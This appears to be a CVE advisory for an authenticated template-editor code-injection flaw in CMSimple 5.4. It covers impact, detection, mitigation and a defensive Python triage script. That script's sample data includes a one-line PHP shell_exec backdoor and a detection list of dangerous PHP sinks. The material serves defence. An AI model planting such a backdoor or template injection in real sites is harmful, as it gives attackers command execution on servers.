CVE-2021-47735
Authenticated Remote Code Execution in CMSimple 5.4 Template Editor
Publication date: 2025-12-23
Last updated on: 2025-12-23
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cmsimple | cmsimple | 5.4 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-47735 is an authenticated remote code execution vulnerability in CMSimple version 5.4. The template editor writes whatever an authenticated user submits straight into the template file, and template files are PHP executed by the web server, so an attacker with valid login credentials can store arbitrary PHP there. The save request requires a valid CSRF token, but that token is issued to any logged-in session, so it protects only against cross-site requests, not against an attacker who already holds credentials. Once the crafted template (for example one containing a reverse shell) is saved, the injected code runs the next time any page rendered with that template is requested, giving remote code execution on the server. [1, 2]
How can this vulnerability impact me?
This vulnerability can lead to full system compromise. An authenticated attacker who injects PHP into a template file can execute arbitrary commands with the privileges of the web server process, which is typically enough to read the site's configuration and data, modify content, install persistent backdoors, and pivot to other systems reachable from the server. The result can be unauthorized access, data theft, service disruption, or further attacks launched from the compromised host. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Exploitation leaves two kinds of evidence. In the web server access logs, look for POST requests to the template save action from authenticated sessions, and correlate them with the time, source address and account of legitimate template edits. Note that access logs record the request line and status, not the request body, so the log tells you who saved a template and when, but not what was written; the content has to be checked on disk. In the templates/ directory, inspect the template files themselves. CMSimple templates legitimately contain PHP calls such as <?php echo content(); ?>, so grepping for <?php alone produces only noise; search instead for functions a template has no reason to call (exec, shell_exec, system, passthru, popen, proc_open, eval, base64_decode, fsockopen), and compare file hashes or modification times against a baseline taken from a known-good install. Logging in with valid credentials and reviewing the template in the editor is another way to spot injected code, and a scheduled script that re-hashes the template files and alerts on any change catches modifications made outside normal maintenance windows. [1]
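The following triage script implements the checks described above: it parses combined-format access log lines for POSTs to the template save action, scans template text for PHP sinks a legitimate CMSimple template never calls, and compares template hashes against a baseline. It is an added example, not code from CMSimple or from this advisory's sources. The query parameter names (file=template, action=save) are assumed from CMSimple's admin URL conventions and must be confirmed against your own install's logs; the log lines and template contents are constructed sample data.

```python
"""Triage helpers for suspected abuse of the CMSimple 5.4 template editor
(CVE-2021-47735).  Added example, not CMSimple code.  ASSUMPTION: the admin
query parameters file=template and action=save follow CMSimple's admin URL
conventions; verify them in your own access logs before relying on them."""
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# PHP sinks that a legitimate CMSimple template has no reason to call.
DANGEROUS_SINKS = ("exec", "shell_exec", "system", "passthru", "popen",
                   "proc_open", "eval", "assert", "base64_decode", "fsockopen")
_SINK_RE = re.compile(r"\b(" + "|".join(DANGEROUS_SINKS) + r")\s*\(", re.I)

# Apache/nginx "combined" access log format (assumed log format).
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+')


def template_save_posts(log_lines):
    """Return (ip, timestamp, target) for each POST to the template save action.
    Access logs carry no request body, so this shows who saved a template and
    when; the saved content must be checked on disk with scan_template()."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        qs = parse_qs(urlsplit(m.group("target")).query)
        if qs.get("file") == ["template"] and qs.get("action") == ["save"]:
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


def scan_template(text):
    """Return (line_no, sink, line) for every dangerous PHP sink in a template.
    CMSimple templates legitimately embed PHP such as <?php echo content(); ?>,
    so matching on '<?php' alone would be pure noise; match on the sinks."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in _SINK_RE.finditer(line):
            findings.append((no, m.group(1).lower(), line.strip()))
    return findings


def sha256_text(text):
    return hashlib.sha256(text.encode()).hexdigest()


def changed_files(baseline, current):
    """Compare {path: sha256} maps; return paths that are new or whose hash
    differs from the baseline taken after a known-good install or upgrade."""
    return sorted(p for p, h in current.items() if baseline.get(p) != h)


# Constructed sample data so the script runs stand-alone (not from a real host).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Dec/2025:10:01:02 +0000] "GET /?file=template&action=edit HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Dec/2025:10:01:40 +0000] "POST /?file=template&action=save HTTP/1.1" 302 0',
    '198.51.100.4 - - [23/Dec/2025:10:02:00 +0000] "POST /?file=content&action=save HTTP/1.1" 302 0',
    '198.51.100.4 - - [23/Dec/2025:10:02:10 +0000] "GET / HTTP/1.1" 200 8192',
]
CLEAN_TEMPLATE = ("<html><body>\n<?php echo content(); ?>\n"
                  "<?php echo toc(); ?>\n</body></html>\n")
# Constructed tampered copy: a one-line command-execution backdoor appended.
TAMPERED_TEMPLATE = CLEAN_TEMPLATE + \
    "<?php if(isset($_GET['c'])){echo shell_exec($_GET['c']);} ?>\n"

if __name__ == "__main__":
    for ip, ts, target in template_save_posts(SAMPLE_LOG):
        print(f"template saved by {ip} at {ts} via {target}")
    for no, sink, line in scan_template(TAMPERED_TEMPLATE):
        print(f"line {no}: {sink}() -> {line}")
    path = "templates/default/template.htm"   # assumed template path
    baseline = {path: sha256_text(CLEAN_TEMPLATE)}
    current = {path: sha256_text(TAMPERED_TEMPLATE)}
    print("changed:", changed_files(baseline, current))
```

In practice, feed `template_save_posts` the real access log, run `scan_template` over every file under templates/, and store the baseline hashes somewhere the web server account cannot write, otherwise an attacker who has already achieved code execution can simply rewrite the baseline.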
What immediate steps should I take to mitigate this vulnerability?
Check CMSimple for a release that addresses this issue and upgrade; this page lists only version 5.4 as affected. Because the exploit requires a valid login, the most effective immediate control is protecting the admin credentials and session: use a strong, unique password, rotate it if compromise is suspected, serve the admin interface only over HTTPS, and restrict who can reach it (for example by IP allow-list or VPN). Limit template editing to the few people who genuinely need it, and treat every template change as a privileged operation to be logged and reviewed. Put file integrity monitoring on the templates/ directory so unexpected modifications raise an alert. A WAF rule that blocks POST requests to the template save endpoint containing PHP sinks such as exec(), shell_exec(), system() or eval() can reduce exposure, but keep in mind that the editor legitimately submits PHP (template calls such as <?php echo content(); ?>), so a rule that blocks every <?php tag will break normal template editing; match on the dangerous functions instead. Where the template editor is not needed at all, disabling it or making the template files read-only for the web server account removes the attack surface entirely. [2]